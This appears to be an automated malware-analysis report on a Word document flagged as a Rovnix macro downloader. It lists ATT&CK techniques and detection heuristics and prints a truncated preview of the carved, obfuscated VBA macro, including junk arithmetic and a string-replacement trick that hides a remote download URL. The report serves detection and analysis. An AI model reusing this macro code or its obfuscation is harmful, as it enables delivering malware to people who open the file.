Verdict: MALICIOUS
Risk Score: 262

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is an OOXML document containing VBA macros, specifically an Auto_Close macro that uses CreateObject to execute code. ClamAV signatures identify this as Doc.Downloader.Rovnix-6497736-0. The VBA script attempts to run other macros via Application.Run, indicating downloader functionality. The presence of VBA macros together with the downloader behavior strongly suggests a malicious document, likely delivered via spearphishing.
Heuristics (6)

- ClamAV: Doc.Downloader.Rovnix-6497736-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Rovnix-6497736-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project; VBA macros present
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
- CreateObject call (high, OLE_VBA_CREATEOBJ)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All extracted URLs were found in document text (OOXML body / shared strings).
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 16008 bytes | c027436ca5f10f8b3b501a437bcf7e692c56f57f8629b71025bc98a349aa1501 |

Preview script for macros.bas (first 1,000 lines of the extracted script, as carved from the sample):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub EQoAYkZxUYqcJL()
IRPVRTKNLJEI = Acos(241) - 2805 - Acos(4423)
PxJOJYA = 2919 + Acos(3721) + Acos(4748) + Acos(1943)
ZPUfNCvR = Acos(493) + Acos(3449) + 4227 + Acos(1348)
Application.Run "fKdqfXDnviSzzV"
nIYpSJEuPYp = 4722 - 4068 - 2754 - 2643 - 3401 - 1988 - 745
cpUkXTBzHHr = 4390 + Acos(3713) + Acos(1951) + Acos(4503) + Acos(896) + Acos(3347)
WEbcMbbn = Acos(1888) - 2499 - 86 - Acos(1123)
End Sub
Sub TLNGBRGDjzHRCk()
QAjqgqwrZ = 73 + 4815 + 602
DnviSzzVwABE = Acos(2590) + 1050 + 800 + 4385 + 200 + Acos(421) + 1277
LNGBRGDjzHRC = "ivLZWjAgjH" + "iOQ" + Left("buvSZyMBpQ", 3)
Application.Run "ocqyDfPWIjcbqIDML"
rTNwOEIp = Acos(3077) - 458 - 4891 - Acos(1029) - Acos(4066)
wyOZdcKZEdX = "MSEPDgLBJfrP" + Left("KnNEKKxWHK", 7) + Left("jvjpIvWibu", 10)
OLRzvPjE = "JCrViWxvVi" + Left("JycAHGdRBc", 7) + Left("IUMvKgUqbu", 9) + "LOCgboQiVKQcXOQ"
XyRJXRAjdERv = RTrim("ABoYWLGgOHxTBWW") + "gIEopdFikZTvqUFdvNoZNYXyvGw" + "D" + LTrim("Z")
SfSTJuDN = Acos(2712) - Acos(774) - Acos(1509)
End Sub
Function Acos(X)
Acos = Atn(X) - Atn(1)
End Function
Public Function MOkkOTMwCZFPf(jyCwpdBPxJjvOWEIiv, MLJNokpZoRXQv, gJJTGCNoMQMHuE)
oPibRCdnSZg = Left("upZNOxXunG", 1) + "qExgfTdIBrI" + Left("VpUquKRiHg", 3) + Left("qCJLxzNkkw", 2) + Left("kUEinydprK", 2) + "SuB"
CNiXrGyZW = Left("EkRGgcWvZd", 1) + "cG"
NOBMRvP = Acos(3899) - Acos(2392) - 385 - 3748 - 1851
vTQrxYvB = 1690 - 2091 - 1161 - 2414 - Acos(4235) - 2031 - 2100
MOkkOTMwCZFPf = Replace(jyCwpdBPxJjvOWEIiv, MLJNokpZoRXQv, gJJTGCNoMQMHuE)
VXAXwMZHyrdE = Left("xNnYpSAWTP", 6) + "HiJbYdO" + "BpfGbbrSgkMNY" + Left("SuFFrwYAJR", 2)
TKNuWOgziF = Acos(2774) + 663 + Acos(2010) + Acos(4594)
fSqNPPE = Acos(2989) + Acos(1664) + 815 + 4151
LUOdLgF = RTrim("APPWodGNBoxcjSVjNdzYnzGQ") + "CgDrxZWPvIUQLCBHqDq" + "yScEzpz" + RTrim("ygKwyAJgVfVZ")
TIbOdHOOO = "OrRMGfWMLwypc" + LTrim("fJTU") + "Qnwv" + "QABoxJA"
uQfBYOCMMj = "FUKyEPMDFbbCzGkfDUrDKYWCnqnoY" + RTrim("TDvgIoLLBX") + LTrim("YZQuUWNIf")
LSEYgGM = "IJxNCvoYccy" + "TRCxigwnjW" + "yWUQdGW" + "zFYMKvVgEkzUwF" + "ziTNqbbDcTyHoPp" + "pKjMJRw"
ATzMSiKcSU = 4898 + Acos(112)
CVQqYQzA = 4972 - 3112 - Acos(3502) - Acos(1834) - Acos(663) - Acos(153)
TxCYjHnYXCBQ = Left("cBgECYAWji", 6) + "iRDkzCJP"
bPGEkVNvXJX = "nPOiWKrjCoqdcq" + "jczGMp" + Left("qQVrMJiMxr", 3) + "ZNkruqDdUrz"
wguKgfTBvpPW = Acos(4018) - Acos(4688) - Acos(2366)
LirpvUIkdDyj = "MwL" + Left("FYfORkVWvg", 5) + "fFD"
dcUnrrSujTD = Left("KpFukBzxyE", 2) + "RRzcR" + Left("KgQDDnJLyb", 1)
QcFSAvXp = "vfVUyYgKdKPNbCAkCubHkBbdv" + "JKGiwUH" + RTrim("duuAQCLLKXQJqxbNKbiXCGFPQqd")
GBvJfZAMwd = Acos(1397) + Acos(1435) + 1649 + 4193 + Acos(1761) + Acos(4263)
End Function
Sub ocqyDfPWIjcbqIDML()
fZixyWCfu = 2973 + Acos(556) + 4681 + Acos(654) + Acos(2099) + Acos(1844) + Acos(4545)
ZzDOIfQ = Acos(2544) + Acos(4383) + 1743 + Acos(4185) + Acos(4222)
jznDyAvjJMQ = Acos(233) + 4494
zvqQzSzbI = 4428 - 4441 - 749 - Acos(4720) - Acos(868) - 4644 - 4413
wOEpEyErP = "SbbfiCBrMXLqXUPqLqwZpECKCKQbOj" + "XOgoEgPITZZyyDYziqAcDvHdDun" + "zuOTZLAij" + "HoPJGETFPnwEzbonpxWHA"
kJHJDVnxAdoTCp = "bBQPRdwEDxbFyxuxYgTKgQgQhpSKNVpYIibEjSrSIMzgBjKoO hpSKNVpYIibEjpSKNVpYIibEjp://qdkngijbqnwMJWuDNVEWUCihiqwrbzudwMJWuDNVEWUCi.cobBQPRdwEDxbF/REX/yxuxYgTKgQgQVqLjZkURCkFKick.php?upSKNVpYIibEjbBQPRdwEDxbFSrSIMzgBjKoO=bobBQPRdwEDxbFbj"
kJHJDVnxAdoTCp = MOkkOTMwCZFPf(kJHJDVnxAdoTCp, "bBQPRdwEDxbF", "m")
kWwVMog = "IrZyyVLnIGFdjo" + "vNzZUOSCwv" + LTrim("pU")
DuCSTJDgnEoX = 88 - 1694 - Acos(1118) - Acos(3945) - Acos(3288) - 61
wkRCxEQi = 1103 - 4180 - 3081 - Acos(1857) - 1111 - Acos(2491)
uoUURCP = 4888 - Acos(4117) - Acos(1591) - 2301
yccURGEwbd = "uYdOWvI" + Left("nIKVUDWopr", 4)
SOPOvvESF = RTrim("MqWC") + LTrim("PjRgTwPSYnuILzR") + "iNPqHD" + RTrim("ULRvYXQ") + "
... (truncated)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 43520 bytes | 0e9920b6a85fe7c5c256ac6449d579321d5993dfb0abd2ebb7498895ac5b331b |

Detection for vbaProject_00.bin:
- ClamAV: Doc.Downloader.Rovnix-6497736-0
- Obfuscation or payload: unlikely